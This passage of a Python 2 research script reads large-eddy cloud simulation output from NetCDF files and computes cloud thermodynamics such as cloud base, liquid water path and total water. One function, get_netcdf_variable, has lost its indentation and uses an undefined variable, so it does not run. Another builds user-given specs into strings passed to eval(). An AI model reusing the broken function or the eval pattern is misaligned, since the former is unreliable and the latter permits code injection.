# solve_rw_lwp(p_surf,theta,lwp,pblh)
#
# c) Helper functions
# calc_psat_w(T)
# calc_sat_mixr(p,T)
# calc_rh(rw,T,press)
#
# Notes
# =====
# 1) Input file name should contain complete path in addition to the file name
# e.g. '/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# 2) Voima requires python 2.7.10, so execute "module load Python/2.7.10"
#
def GetEmu1Vars(fname,tstart,tend,ttol=3600.,start_offset=0,end_offset=0):
    # Function calculates LES output variables for emulator v1.0 as defined in the ECLAIR proof-of-concept document
    # https://docs.google.com/document/d/1L-YyJLhtmLYg4rJYo5biOW96eeRC7z_trZsow_8TbeE/edit
    # Inputs:
    #   fname        Complete path and name of a time statistics file (*.ts.nc)
    #   tstart, tend Time window (s)
    # Optional inputs
    #   ttol         Time tolerance (s) for finding averaging window
    #   start_offset Point offset to start index (time in the NetCDF files is the save time, so typically should ignore the first points)
    #   end_offset   -||- end index
    #
    # Example:
    #   file='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
    #   tstart=2.5*3600
    #   tend=3.5*3600
    #   cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std = GetEmu1Vars(file,tstart,ttol=10.,start_offset=1)
    #
    # NOTE(review): Python 2 code (print statements). Relies on the helpers
    # ls_fit() and average_scaled() defined elsewhere in this module.
    import os
    import netCDF4 as netcdf
    import numpy
    #
    # Outputs (initialized to the -999. error sentinel returned on failure)
    cfrac=-999.     # Cloud fraction
    CDNC=-999.      # Cloud droplet number concentration in cloudy columns (#/kg)
    prcp=-999.      # Precipitation tendency = domain mean surface precipitation (kg/m^2/s)
    dn=-999.        # In-cloud aerosol number loss tendency = change in interstitial aerosol+cloud droplet number concentration in cloudy columns (#/kg/s)
    we=-999.        # Mixing between FT and BL = domain mean entrainment velocity (m/s)
    #
    # ... and their standard deviations
    cfrac_std=-999.; CDNC_std=-999.; prcp_std=-999.; dn_std=-999.; we_std=-999.
    #
    # File must exist
    if not os.path.lexists(fname):
        print fname+' not found!'
        return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
    #
    # Open the target NetCDF file
    ncid = netcdf.Dataset(fname,'r')
    #
    # Time
    # ====
    if 'time' not in ncid.variables:
        print 'Time not found from '+fname+'!'
        return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
    times = ncid.variables['time']
    #
    # Find the closest matching time points
    ind_tstart=0
    ind_tend=0
    i=0
    for t in times:
        if abs(t-tstart)<abs(times[ind_tstart]-tstart): ind_tstart=i
        if abs(t-tend)<abs(times[ind_tend]-tend): ind_tend=i
        i+=1
    #
    if abs(times[ind_tstart]-tstart)>ttol or abs(times[ind_tend]-tend)>ttol:
        print 'Matching start or end time not found from '+fname+'!'
        return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
    #
    # Apply offset (typically the first point is ignored)
    ind_tstart+=start_offset
    ind_tend+=end_offset
    if ind_tstart<0 or ind_tstart>ind_tend or ind_tend>=len(times):
        print 'Invalid data range for '+fname+': ',ind_tstart,ind_tend,len(times)
        return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
    #
    #
    # Outputs
    # ========
    # Cloud fraction
    if 'cfrac' not in ncid.variables:
        print 'Cloud fraction not found from '+fname+'!'
        return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
    #
    # Need cloud fractions for normalizing domain mean interstitial and cloud droplet number concentrations
    cfrac_ts=ncid.variables['cfrac'][ind_tstart:ind_tend]
    ncfrac = sum( cfrac_ts>0.0 )    # The number of non-zero cloud fractions
    #
    cfrac = numpy.mean( cfrac_ts )
    cfrac_std = numpy.std( cfrac_ts )
    #
    if 'Nc_ic' in ncid.variables:    # Level 4 = SALSA microphysics
        # Cloud droplet number concentration averaged over cloudy columns (#/kg)
        CDNC,CDNC_std=average_scaled(ncid.variables['Nc_ic'][ind_tstart:ind_tend],cfrac_ts)
        #
        # Surface precipitation (kg/m^2/s)
        if ind_tstart < ind_tend:
            prcp = numpy.mean( ncid.variables['rmH2Opr'][ind_tstart:ind_tend] )
            prcp_std = numpy.std( ncid.variables['rmH2Opr'][ind_tstart:ind_tend] )
        else:
            # Single point: no spread can be estimated
            prcp = ncid.variables['rmH2Opr'][ind_tstart]
            prcp_std = -999.
        #
        # Change in in-cloud aerosol+cloud droplet number concentration
        if ncfrac>=2:    # Linear fit needs at least two data points
            tt = ncid.variables['time'][ind_tstart:ind_tend]      # Time (s) vector
            nc = ncid.variables['Nc_ic'][ind_tstart:ind_tend]     # Cloud droplets (domain mean)
            nc += ncid.variables['Na_int'][ind_tstart:ind_tend]   # + interstitial aerosol (domain mean)
            # Normalize by cloud fraction => concentrations for cloudy columns
            i=0
            for cf in cfrac_ts:
                if cf>0:
                    nc[i]/=cf
                else:
                    # Divide-by-zero => NaN
                    nc[i]=float('nan')
                i+=1
            #
            a,dn,a_std,dn_std=ls_fit(tt,nc)    # Least squares fit (nc=a+b*tt); slope b is the tendency
        else:
            dn=-999.
            dn_std=-999.
    else:    # Level 3 = saturation adjustment method (given CDNC)
        # Cloud droplet number concentration (#/kg): fixed
        if ind_tstart < ind_tend:
            CDNC = numpy.mean( ncid.variables['CCN'][ind_tstart:ind_tend] )
            CDNC_std = numpy.std( ncid.variables['CCN'][ind_tstart:ind_tend] )
        else:
            CDNC = ncid.variables['CCN'][ind_tstart]
            CDNC_std = -999.
        #
        # Surface precipitation (kg/m^2/s): variable prcp is in W/m^2=J/s/m^2, which can be
        # converted to kg using latent heat of vaporization (2.5e+06 J/kg)
        if ind_tstart < ind_tend:
            prcp = numpy.mean( ncid.variables['prcp'][ind_tstart:ind_tend] )/2.5e6
            prcp_std = numpy.std( ncid.variables['prcp'][ind_tstart:ind_tend] )/2.5e6
        else:
            prcp = ncid.variables['prcp'][ind_tstart]/2.5e6
            prcp_std = -999.
        #
        # Change in in-cloud aerosol+cloud droplet number concentration: N/A
    #
    # Entrainment velocity (m/s)
    # we=dz/dt+D*z, where z is PBL height and D is large scale divergence (1.5e-6 1/s) (see e.g. Kazil et al., ACP, 2016).
    if ind_tstart < ind_tend:
        # Must have at least two points for the slope, but should have more than that
        zz = ncid.variables['zi1_bar'][ind_tstart:ind_tend]    # PBL height (m) vector
        tt = ncid.variables['time'][ind_tstart:ind_tend]       # Time (s) vector
        a,dzdt,a_std,dzdt_std=ls_fit(tt,zz)    # Least squares fit (zz=a+b*tt)
        z=numpy.mean(zz)    # Mean PBL height
        we=dzdt+1.5e-6*z
        we_std=dzdt_std
    else:
        we = -999.
        we_std = -999.
    #
    # Close file
    ncid.close()
    #
    # All done
    return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
def get_netcdf_updraft(fname,tstart,tend,ttol=3600.,tol_clw=1e-5):
    # Function for calculating mean positive updraft velocities and cloud droplet number concentrations
    # at cloud base (see Romakkaniemi et al., 2009) from 4D data (*.nc).
    #
    # Romakkaniemi, S., G. McFiggans, K.N. Bower, P. Brown, H. Coe, T.W. Choularton, A comparison between
    # trajectory ensemble and adiabatic parcel modelled cloud properties and evaluation against airborne
    # measurements, J. Geophys. Res., doi:10.1029/2008JD011286, 2009
    #
    # Inputs:
    #   fname        Complete file path and name (*.nc)
    #   tstart, tend Averaging time window (s)
    # Optional inputs
    #   ttol         Time tolerance (s) for finding averaging window
    #   tol_clw      Cloud liquid water mixing ratio (kg/kg) threshold defining the cloud base
    #
    # Example:
    #   file='/arch/eclair/UCLALES-SALSA_training_simulations/case_emulator_DESIGN_v3.0.0_LES_ECLAIR_branch_ECLAIRv2.0.cray.fast_LVL3/emul001/emul001.nc'
    #   w,cdnc,cdnc_w,n=get_netcdf_updraft(file,9000.,12600.,ttol=10.)
    #   print w,cdnc,cdnc_w,n
    #
    import os
    import netCDF4 as netcdf
    import numpy
    #
    # File must exist
    if not os.path.lexists(fname):
        raise RuntimeError(fname+' not found!')
    #
    # Open the target NetCDF file
    ncid = netcdf.Dataset(fname,'r')
    #
    # Validate that the required variables and dimensions are present
    if 'time' not in ncid.variables:
        raise RuntimeError('Time not found from '+fname+'!')
    elif 'w' not in ncid.variables:
        raise RuntimeError('Variable w not found from '+fname+'!')
    elif 'l' not in ncid.variables:
        raise RuntimeError('Variable l not found from '+fname+'!')
    elif 'time' not in ncid.variables['w'].dimensions or 'time' not in ncid.variables['l'].dimensions:
        raise RuntimeError('Time is not a dimension for w or l (file '+fname+')!')
    #
    # Time
    times = ncid.variables['time']
    #
    # Spatial dimensions of one time slice of liquid water
    dims=ncid.variables['l'][0,].shape    # x, y, z
    #
    # Optional: CDNC from UCLALES-SALSA simulations
    cdnc_calc='S_Nc' in ncid.variables
    #
    #
    # Outputs (accumulated as sums over the loop, normalized afterwards)
    wpos=0.      # Mean positive updraft velocity at the cloud base (m/s)
    w2pos=0.     # Velocity weighted mean positive updraft velocity at the cloud base (m/s)
    cdnc_p=0.    # Mean cloud droplet number concentration at the cloud base with positive updraft velocity (1/kg)
    cdnc_wp=0.   # Velocity weighted mean cloud droplet number concentration at the cloud base with positive updraft velocity (1/kg)
    n=0          # Number of cloud bases with positive updraft (-)
    #
    ind=-1
    for tt in times:
        # Time range selection
        ind+=1
        if tt<tstart-ttol:
            continue
        elif tt>tend+ttol:
            break    # Assuming monotonic time
        #
        # Data for this time step
        w=ncid.variables['w'][ind,]
        l=ncid.variables['l'][ind,]
        if cdnc_calc: cdnc=ncid.variables['S_Nc'][ind,]
        #
        # Calculations
        # NOTE(review): the 'else' branch below is intentionally dead code --
        # the older per-cell scan kept for reference; the numpy.where-based
        # column search is always used.
        if True:
            # This is much faster
            for i in range(0,dims[0]):
                for j in range(0,dims[1]):
                    # Lowest level exceeding the liquid water threshold = cloud base
                    kk, = numpy.where(l[i,j,:]>tol_clw)
                    if len(kk)>0 and w[i,j,kk[0]]>0.:
                        k=kk[0]
                        n+=1
                        wpos+=w[i,j,k]
                        w2pos+=w[i,j,k]**2
                        if cdnc_calc:
                            cdnc_p+=cdnc[i,j,k]
                            cdnc_wp+=w[i,j,k]*cdnc[i,j,k]
        else:
            # The old method
            i=0; j=0
            while i<dims[0] and j<dims[1]:
                k=0
                while k<dims[2]:
                    if l[i,j,k]>tol_clw:
                        # Found cloud base, but only the positive updraft velocities are counted
                        if w[i,j,k]>0.:
                            n+=1
                            wpos+=w[i,j,k]
                            w2pos+=w[i,j,k]**2
                            if cdnc_calc:
                                cdnc_p+=cdnc[i,j,k]
                                cdnc_wp+=w[i,j,k]*cdnc[i,j,k]
                        break
                    k+=1
                if j+1<dims[1]:
                    j+=1
                else:
                    i+=1
                    j=0
    #
    # Normalize the accumulated sums into means; -999. marks "no data"
    if n>0:
        w2pos/=wpos    # w-weighted mean: sum(w^2)/sum(w)
        wpos/=n
        if cdnc_calc:
            cdnc_p/=n
            cdnc_wp/=(wpos*n)
        else:
            cdnc_p=-999.
            cdnc_wp=-999.
    else:
        wpos=-999.
        w2pos=-999.
        cdnc_p=-999.
        cdnc_wp=-999.
    #
    # Close file
    ncid.close()
    #
    # Outputs: mean positive updraft velocity and cloud droplet number concentrations (mean and weighted with velocity) at the cloud base
    return wpos,w2pos,cdnc_p,cdnc_wp,n
def get_netcdf_variable(fname,var_name,start_time,end_time=-10000.,ttol=3600.,start_offset=0,end_offset=0):
# Function for extracting data from a NetCDF file based on the given time value (or range).
#
# Inputs:
# fname Complete file path and name
# var_name NetCDF variable name
# start_time Target or start (when end_time is specified) time value
# Optional inputs
# end_time Optional end time value
# ttol Time tolelance (s) for finding averaging window
# start_offset Point offset to start index (time in the NetCDF files is the save time, so typically should ignore the first points)
# end_offset -||- end index
#
# Example:
# file='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# lmax=get_netcdf_variable(file,'lmax',3*3600,ttol=10)
# lmax=get_netcdf_variable(file,'lmax',2.5*3600,3.5*3600,ttol=10.,start_offset=1)
import os
import numpy
import netCDF4 as netcdf
#
# File must exist
if not os.path.lexists(fname): raise RuntimeError(fname+' not found!')
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
if 'time' not in ncid.variables:
raise RuntimeError('Time not found from '+fname+'!')
elif var_name not in ncid.variables:
raise RuntimeError('Variable '+var_name+' not found from '+fname+'!')
elif 'time' not in ncid.variables[var_name].dimensions:
raise RuntimeError('Time is not a dimension for '+var_name+' (file '+fname+')!')
#
# Time
times = ncid.variables['time']
#
# Find the correct time value
i=0
if end_time>-9999.:
# Time from start_time to end_time (closests matching start and end time values)
ind_start=0
ind_end=0
for tt in times:
# Closest match
if abs(tt-start_time)<abs(times[ind_start]-start_time): ind_start=i
if abs(tt-end_time)<abs(times[ind_end]-end_time): ind_end=i
i+=1
#
if abs(times[ind_start]-start_time)>ttol or abs(times[ind_end]-end_time)>ttol:
print 'Matching start or end time not found from '+fname+'!'
return -999.
#
# Apply offset (typically the first point is ignored
ind_start+=start_offset
ind_end+=end_offset
if ind_start<0 or ind_start>ind_end or ind_end>=len(times):
print 'Invalid data range for '+fname+'!'
return -999.
#
# Average over time dimension
ind=ncid.variables[var_name].dimensions.index('time')
#
out=numpy.mean( ncid.variables[var_name][ind_start:ind_end,],axis=ind )
# Could add standard deviations?
#out_std = numpy.std( ncid.variables[var_name][ind_start:ind_end,],axis=ind )
else:
# Single time value (closest match)
ind=0
for tt in times:
# Closest match
if abs(tt-start_time)<abs(times[ind]-start_time): ind=i
i=i+1
#
if abs(times[ind]-tstart)>ttol:
print 'Matching time not found from '+fname+'!'
return -999.
#
# Apply offset (typically the first point is ignored
ind+=start_offset
if ind<0 or ind>=len(times):
print 'Invalid index for '+fname+'!'
return -999.
#
out=ncid.variables[var_name][ind,]
#
# Close file
ncid.close()
return out
def GetEmu2Vars(path):
    # Function calculates LES output variables for emulator v2.0 as defined in the ECLAIR proof-of-concept document
    # https://docs.google.com/document/d/1L-YyJLhtmLYg4rJYo5biOW96eeRC7z_trZsow_8TbeE/edit
    #
    # Inputs:
    #   path    Complete path to the root data
    # Outputs:
    #   A 2D array of values as described below
    #
    # Example:
    #   path='/arch/eclair/UCLALES-SALSA_training_simulations/case_emulator_DESIGN_v3.0.0_LES_ECLAIR_branch_ECLAIRv2.0.cray.fast_LVL3/'
    #   data=GetEmu2Vars(path)
    #
    # NOTE(review): Python 2 code (print statements); depends on the sibling
    # functions get_netcdf_variable() and get_netcdf_updraft().
    import os
    #
    # Time window (s)
    tstart=2.5*3600
    tend=3.5*3600
    #
    # File name template; cases are numbered emul001, emul002, ...
    if path.endswith('/'):
        fmt='emul%03u/emul%03u'
    else:
        fmt='/emul%03u/emul%03u'
    #
    # Examine the data files: loop until the next case directory is missing
    out=[]
    i=1
    while True:
        # Data must exist
        if not os.path.lexists( (path+fmt+'.nc')%(i,i) ) and not os.path.lexists( (path+fmt+'.ts.nc')%(i,i) ):
            if i==1:
                raise RuntimeError('Data not found from '+path+'!')
            else:
                break
        #
        # Emulator v2.0 variables
        # - Tolerance for the start and end times is +/- 10 s
        # - No need to ignore the first point when averaging instantaneous variables (rain processes and w calculated from 4D data)
        #
        # Time-statistics data file
        file=(path+fmt+'.ts.nc')%(i,i)
        # 1a) Rain water loss (evaporation + surface precipitation)
        # Change in column rain water due to condensation (kg/m^2/s)
        cond=get_netcdf_variable(file,'cond_rr',tstart,tend,ttol=10.)
        # Change in column rain water due to sedimentation (kg/m^2/s)
        sedi=get_netcdf_variable(file,'sedi_rr',tstart,tend,ttol=10.)
        #
        # 1b) Rain water production (not including divergence - with that the total production is the same as total loss)
        # Change in column rain water due to coagulation (kg/m^2/s)
        coag=get_netcdf_variable(file,'coag_rr',tstart,tend,ttol=10.)
        # Change in column rain water due to autoconversion (kg/m^2/s)
        auto=get_netcdf_variable(file,'auto_rr',tstart,tend,ttol=10.)
        # Change in column rain water due to diagnostics (kg/m^2/s)
        diag=get_netcdf_variable(file,'diag_rr',tstart,tend,ttol=10.)
        #
        # 2) Precipitation statistics (ignore the first point, which is an average from the previous time period)
        # Surface precipitation rate (W/m^2)
        prcp=get_netcdf_variable(file,'prcp',tstart,tend,ttol=10.,start_offset=1)
        # 1 W = J/s, which can be converted to mass flux by using latent heat of water (2.5e+6 J/kg)
        prcp/=2.5e6    # kg/m^2/s
        #
        # 3) Cloud base positive updraft velocity (m/s), from the 4D output
        file_4d=(path+fmt+'.nc') % (i,i)
        wpos,w2pos,cdnc_p,cdnc_wp,n = get_netcdf_updraft(file_4d,tstart,tend,ttol=10.)
        #
        out.append([i,cond,sedi,coag,auto,diag,prcp,wpos,w2pos,cdnc_p,cdnc_wp,n])
        #
        # Progress report: header once, then one line per case
        if i==1: print 'id cond sedi coag auto diag prcp wpos w2pos cdnc_p cdnc_wp n'
        print ('%2g %8.3e %8.3e %8.3e %8.3e %8.3e %8.3e %6.4f %6.4f %7.3e %7.3e %7g')%(i,cond,sedi,coag,auto,diag,prcp,wpos,w2pos,cdnc_p,cdnc_wp,n)
        #
        i+=1
    #
    # Output lines are: id, cond, sedi, coag, auto, diag, prcp, wpos, w2pos, cdnc_p, cdnc_wp, n
    return out
def extract_write_data(fname_template,specs,name_out='',nmax=9999,skip_errs=False):
    # Extract and process data from one or more NetCDF files, and write it to a text file (optional)
    #
    # Inputs:
    #   fname_template  File name template with complete path; any '%' placeholders are
    #                   replaced by the file counter i=1,2,3,...
    #                   e.g. '/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ts.nc'
    #   specs           List of variables including slicing and numpy operations,
    #                   e.g. ['cfrac[10]','wmax[10]'] or ['numpy.amax(l[10,:])']
    #   name_out        Output text file name (optional; nothing is written when empty)
    #   nmax            Maximum number of files (optional)
    #   skip_errs       Don't stop on errors - needed when complete data set is not available (saves just NaN)
    #
    # Returns a list of rows, one per input file, each holding the extracted objects
    # (scalars or numpy arrays) in the order given by specs.
    import os
    import netCDF4 as netcdf
    import numpy
    import sys
    #
    # Convert a command string to evaluable NetCDF form: the variable name x is
    # replaced with "ncid.variables['x']".
    def interpret_fun(cmd):
        # Interpret function call, e.g. 'numpy.amax(l[89,:])', 'numpy.amax(l[2,100,100,:])',
        # 'numpy.amax(l)', 'numpy.amax(P_Rwca,axis=0)'; also calls like
        # "thl[numpy.abs(ncid.variables['time'][:]-10800.).argmin(),:]" are accepted.
        # NOTE: the unreachable "old version" duplicate that followed the return
        # statements in the original has been removed.
        frst=-1
        i=0
        for tt in cmd:
            if tt=='[' or tt==')' or tt==',':
                # First delimiter after the variable name marks its end
                lst=i
                if frst==0:
                    # Command starts directly with the variable name
                    return 'ncid.variables[\''+cmd[frst:lst]+'\']'+cmd[lst:]
                return cmd[:frst+1]+'ncid.variables[\''+cmd[frst+1:lst]+'\']'+cmd[lst:]
            elif tt=='(' or i==0:
                frst=i
            i+=1
        # No solution: return the command unmodified
        return cmd
    #
    # Any '%' in the file name template will be replaced by the counter i=1,2,3,...
    n=fname_template.count('%')
    if n==0: nmax=1 # Template as is
    #
    # Output to text file (optional)
    if len(name_out): fid_out=open(name_out,'w')
    #
    nerr=0    # Number of ignored errors
    msg=''    # Last ignored error message
    files=0   # Count files
    values=0  # Count values extracted
    out=[]    # Complete output
    # Bug fix: the original used range(1,nmax), which skipped the last file and
    # meant a plain template (nmax=1) extracted nothing at all.
    for i in range(1,nmax+1):
        # File name with full path: fill every '%' placeholder with the counter
        if n==0:
            file_name=fname_template
        else:
            file_name=fname_template % ((i,)*n)
        #
        ncid=0
        if not os.path.isfile(file_name):
            if i==1 and n>0: print(file_name+' not found!')
            if not skip_errs or i>90:
                break
            else:
                # Ignore missing file (<90): mark it and save NaNs for this row
                ncid=-999
                nerr+=1
                msg=file_name+' not found!'
        #
        # Open input file
        if ncid==0: ncid = netcdf.Dataset(file_name,'r')
        #
        # Outputs
        row=[] # one row
        for nam in specs:
            if ncid==-999:
                # File not found
                obj = float('nan') # Scalar works quite often
            else:
                # Build the evaluable command for this spec
                if '(' in nam:
                    # There is a call to a function
                    cmd=interpret_fun(nam)
                elif '[' in nam:
                    # Selected data range
                    name=nam[:nam.index('[')]
                    cmd='ncid.variables[\''+name+'\']'+nam[nam.index('['):]
                else:
                    # Data as is
                    cmd='ncid.variables[\''+nam+'\'][:]'
                try:
                    obj = eval( cmd )
                except:
                    if not skip_errs:
                        print("Unexpected error: %s" % sys.exc_info()[0])
                        raise
                    #
                    # Ignore errors
                    obj = float('nan') # Scalar works quite often
                    nerr+=1
                    msg=sys.exc_info()[0]
            #
            # Append data
            row.append(obj)
            #
            # Save data
            if len(name_out):
                # Save variables as space separated strings
                if not hasattr(obj, '__iter__'):
                    # Scalar
                    fid_out.write( str(obj)+" " )
                    values+=1
                else:
                    # Vector/matrix: flatten row by row
                    for val in obj:
                        if not hasattr(val, '__iter__'):
                            # Scalar (1D vector)
                            fid_out.write( str(val)+" " )
                            values+=1
                        else:
                            # Vector (2D matrix)
                            for val2 in val:
                                fid_out.write( str(val2)+" " )
                                values+=1
        #
        # New line after each file
        if len(name_out): fid_out.write( "\r\n" )
        #
        out.append(row)
        #
        if ncid!=-999: ncid.close()
        files+=1
    #
    if len(name_out):
        fid_out.close()
        print(str(files)+' files examined, '+str(values)+' values saved to '+name_out)
        if nerr>0: print(' '+str(nerr)+' error(s) ignored: '+str(msg))
    #
    # Return the data
    return out
#
# LES inputs and outputs
#
def calc_cloud_base(p_surf,theta,rw):
    # Calculate the cloud base height (m), i.e. the lifted condensation level (LCL),
    # for constant liquid water potential temperature (theta [K]) and water vapor
    # mixing ratio (rw [kg/kg]). Surface pressure p_surf is given in Pa.
    # Returns -999 when no cloud forms below 10 km.
    #
    # Thermodynamic constants
    R=287.04       # Specific gas constant for dry air (R_specific=R/M), J/kg/K
    Rm=461.5       # Specific gas constant for water vapor, J/kg/K
    eps=Rm/R-1.0   # M_air/M_water-1
    rcp=R/1005.0   # R/cp
    grav=9.8
    p_ref=1.0e+05
    #
    # March upward in 1 m steps until saturation
    dz=1.
    alt=0.
    pres=p_surf
    rh=0
    while rh<100 and alt<10000:
        # Absolute temperature (K) at the current pressure level
        temp=theta*(pres/p_ref)**rcp
        #
        # Relative humidity (%) at this level
        rh=calc_rh(rw,temp,pres)
        if rh>100:
            break
        #
        alt+=dz
        # Hydrostatic pressure decrement using virtual temperature T*(1+eps*rw)
        pres-=grav*dz*pres/(R*temp*(1+eps*rw))
    #
    # No cloud found below the 10 km cap
    if rh<100:
        return -999
    #
    # Cloud base altitude (m)
    return alt
def calc_lwc_altitude(p_surf,theta,rw,zz):
    # Calculate the cloud water mixing ratio (kg/kg) at a given altitude zz (m) for
    # constant liquid water potential temperature (theta [K]) and water vapor mixing
    # ratio (rw [kg/kg]). Surface pressure p_surf is given in Pa.
    # Returns 0.0 when no cloud forms below zz.
    #
    # Constants
    R=287.04       # Specific gas constant for dry air (R_specific=R/M), J/kg/K
    Rm=461.5       # Specific gas constant for water vapor, J/kg/K
    eps=Rm/R-1.0   # M_air/M_water-1
    cp=1005.0      # Specific heat for a constant pressure
    rcp=R/cp
    grav=9.8
    p_ref=1.0e+05
    lheat=2.5e+06  # Latent heat of vaporization
    #
    # a) Dry ascent in 1 m steps until saturation (or the target altitude)
    dz=1.
    z=0.
    press=p_surf
    rh=0
    while z<zz:
        # Absolute temperature (K)
        tavg=theta*(press/p_ref)**rcp
        #
        # Relative humidity (%)
        rh=calc_rh(rw,tavg,press)
        if rh>100: break
        #
        z+=dz
        # Hydrostatic decrement with virtual temperature T*(1+eps*rw)
        press-=grav*dz*press/(R*tavg*(1+eps*rw))
    #
    # No cloud (or cloud water) below zz
    if rh<100:
        return 0.0
    #
    # b) Moist-adiabatic ascent from cloud base up to zz
    while z<zz:
        z+=dz
        #
        # Moist adiabatic lapse rate
        q_sat=calc_sat_mixr(press,tavg)
        tavg-=grav*(1+lheat*q_sat/(R*tavg))/(cp+lheat**2*q_sat/(Rm*tavg**2))*dz
        #
        # New pressure (virtual temperature now based on saturation mixing ratio)
        press-=grav*dz*press/(R*tavg*(1+eps*q_sat))
    #
    # Cloud water mixing ratio = total - vapor at saturation
    return rw-q_sat
def solve_rw(p_surf,theta,lwc,zz):
    # Solve total water mixing ratio (rw, kg/kg) from surface pressure (p_surf, Pa), liquid water potential
    # temperature (theta, K) and liquid water mixing ratio (lwc, kg/kg) at altitude zz (m).
    # The answer is found by bisection; returns -999 when the iteration fails to converge.
    #
    # Constants
    R=287.04    # Specific gas constant for dry air (R_specific=R/M), J/kg/K
    cp=1005.0   # Specific heat for a constant pressure
    rcp=R/cp
    p00=1.0e+05
    #
    # Minimum water vapor mixing ratio is at least lwc
    q_min=lwc
    #
    # Maximum water vapor mixing ratio is unlimited, but should be smaller
    # than that for a cloud whose base is at the surface
    t_surf=theta*(p_surf/p00)**rcp
    q_max=calc_sat_mixr(p_surf,t_surf)
    #
    # Bisection between q_min and q_max
    k=0
    while k<100:
        q_new=(q_min+q_max)/2
        lwc_calc=calc_lwc_altitude(p_surf,theta,q_new,zz)
        #
        if abs(lwc-lwc_calc)<1e-7:
            break
        elif lwc<lwc_calc:
            q_max=q_new
        else:
            q_min=q_new
        k+=1
    # Failed: the loop ran out of iterations without converging.
    # Bug fix: the original tested k==50, which never matched the k<100 loop on
    # failure and falsely flagged a solution converging on exactly the 50th step.
    if k==100: return -999
    #
    return q_new
def calc_lwp(p_surf,theta,pblh,rt):
    # Calculate liquid water path (kg/m^2) when boundary layer liquid water potential temperature (theta [K]) and total
    # water mixing ratio (rt [kg/kg]) are constants from surface (p_surf, Pa) up to boundary layer top (pblh, Pa or km).
    # In addition to the liquid water path, function returns cloud base and top heights (m) and the maximum (or cloud top)
    # liquid water mixing ratio (kg/kg).
    #
    # Returns: lwp [kg/m^2], zb [m], zc [m], clw_max [kg/kg]
    # (zb and zc stay -999 and lwp/clw_max stay 0 when no cloud forms below the BL top)
    #
    # Constants
    R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
    Rm=461.5 # -||- for water
    ep2=Rm/R-1.0 #M_air/M_water-1
    cp=1005.0 # Specific heat for a constant pressure
    rcp=R/cp
    g=9.8
    p00=1.0e+05
    alvl = 2.5e+06 # ! latent heat of vaporization
    #
    # It is assumed that a pblh value smaller than 10 is in kilometers and a value larger than that is Pa
    if pblh<10.0:
        z_top=pblh*1000. # from km to m (above surface)
        p_top=0.
    else:
        # BL top given as a pressure difference: cap the altitude at 10 km
        z_top=10e3
        p_top=p_surf-pblh # Pa (above surface)
    #
    # Outputs
    lwp=0. # Liquid water path (kg/m^2)
    zb=-999. # Cloud base height (m)
    zc=-999. # Cloud top height (m)
    clw_max=0. # Maximum cloud liquid water
    #
    # a) Integrate to cloud base altitude
    dz=1. # 1 m resolution
    z=0. # The first altitude
    press=p_surf # Start from surface
    RH=0
    while press>p_top and z<=z_top:
        # Temperature (K)
        tavg=theta*(press/p00)**rcp
        #
        # Current RH (%)
        RH=calc_rh(rt,tavg,press)
        if RH>100:
            # Saturated: cloud base reached
            zb=z
            break
        #
        # From z to z+dz
        z+=dz
        # Virtual temperature: T_virtual=T*(1+ep2*rl)
        xsi=(1+ep2*rt)
        # Pressure (Pa)
        press-=g*dz*press/(R*tavg*xsi)
    #
    # No cloud or cloud water
    if RH<=100: return lwp,zb,zc,clw_max
    zb=z
    #
    # b) Integrate up to the given altitude following a moist adiabat,
    #    accumulating the liquid water path
    while press>p_top and z<=z_top:
        # From z to z+dz
        z+=dz
        #
        # Moist adiabatic lapse rate
        q_sat=calc_sat_mixr(press,tavg)
        tavg-=g*(1+alvl*q_sat/(R*tavg))/(cp+alvl**2*q_sat/(Rm*tavg**2))*dz
        #
        # New pressure
        xsi=(1+ep2*q_sat)
        press-=g*dz*press/(R*tavg*xsi)
        #
        # Cloud water mixing ratio = total - vapor
        rc=max(0.,rt-q_sat)
        # LWP integral (rc times layer air mass per unit area)
        lwp+=rc*dz*press/(R*tavg*xsi)
        #
        # Cloud top height
        zc=z
        clw_max=rc
    #
    # Return LWP (kg/m^2) and boundary layer height (m)
    return lwp,zb,zc,clw_max
def solve_rw_lwp(p_surf,theta,lwp,pblh,debug=False):
    # Solve boundary layer total water mixing ratio (kg/kg) from liquid water potential temperature (theta [K]),
    # liquid water path (lwp, kg/m^2) and boundary layer height (pblh, Pa or km) for an adiabatic cloud.
    # For example, solve_rw_lwp(101780.,293.,100e-3,20000.) would return 0.00723684088331 [kg/kg].
    # Returns -999. when the requested LWP is outside the attainable range or the bisection fails.
    #
    # Constants
    R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
    cp=1005.0 # Specific heat for a constant pressure
    rcp=R/cp
    p00=1.0e+05
    #
    # LWP tolerance: 0.1 % but not more than 0.1e-3 kg/m^2 and not less than 1e-3 kg/kg
    tol=min(max(0.001*lwp,0.1e-3),1e-3)
    #
    # Surface temperature (dry, i.e. no fog)
    t_surf=theta*(p_surf/p00)**rcp
    #
    # The highest LWP when RH=100% at the surface (no fog)
    rw_max= calc_sat_mixr(p_surf,t_surf)
    lwp_max,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_max)
    # No fog cases
    if lwp_max<lwp:
        if debug: print('Too high LWP (%5.1f g/m2), the maximum is %5.1f g/m2 (theta=%6.2f K, pblh=%3.0f hPa)' % (lwp*1e3, lwp_max*1e3,theta,pblh/100.))
